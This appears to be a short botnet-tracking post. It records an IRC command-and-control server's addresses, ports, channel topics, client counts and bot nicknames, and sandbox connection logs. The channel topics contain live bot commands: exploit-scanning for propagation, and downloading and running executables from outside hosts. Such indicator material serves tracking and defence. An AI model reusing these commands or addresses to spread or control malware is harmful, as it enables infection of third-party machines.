91.207.6.166(16k botnet)

91.207.6.166 : 1544
91.207.6.166:3838

chanel=##F##

Now talking in ##F##
Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:start.exe 1 ]
Topic By: [ ok ]
Modes On: [ ##F## ] [ +mntMu ]

chanel #abs
Now talking in #abs
Topic On: [ #abs ] [ .asc -S|.http http://rapidshare.com/files/314260469/new|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://www.sundance1rv.com/sc.exe C:ahs.exe 1 ]
Topic By: [ ok ]

Invisible Users: 262
Operators: 1 operator(s) online
Channels: 10 channels formed
Clients: I have 5475 clients and 0 servers
Local users: Current Local Users: 5475 Max: 16055
Global users: Current Global Users: 5475 Max: 14807

Host Name IP Address
dell-d3e62f7e26 10.1.7.2
kat.jatajoo.ru 91.207.6.166
gandu.marcandpatrick.net 218.61.22.10
hot.jatajoo.ru
hot.jatajoo.ru 195.190.13.187
Download URLs
http://195.190.13.187/hot.php (hot.jatajoo.ru)
http://195.190.13.187/hot.php (hot.jatajoo.ru)
http://195.190.13.187/hot.php (hot.jatajoo.ru)

* C&C Server: 91.207.6.166:1544
* Server Password:
* Username: SP3-085
* Nickname: [N00_DEU_XP_3864906]_CHAR(0x08)_ä@
* Channel: (Password: )
* Channeltopic:

* C&C Server: 218.61.22.10:1544
* Server Password:
* Username: SP3-326
* Nickname: [00_DEU_XP_7387315]
* Channel: ##f## (Password: open)
* Channeltopic:

Outgoing connection to remote server: hot.jatajoo.ru TCP port 80
Outgoing connection to remote server: hot.jatajoo.ru TCP port 80

Categories: Uncategorized